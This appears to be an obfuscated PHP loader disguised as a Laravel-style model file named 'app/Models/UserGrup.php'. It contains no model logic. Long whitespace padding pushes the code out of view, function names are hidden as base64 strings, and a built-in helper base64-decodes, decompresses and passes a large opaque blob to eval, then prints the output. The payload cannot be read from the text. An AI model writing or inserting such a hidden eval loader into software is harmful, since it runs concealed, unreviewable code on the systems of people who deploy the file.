<?php 
        $__='printf';$_='Loading app/Models/UserGrup.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
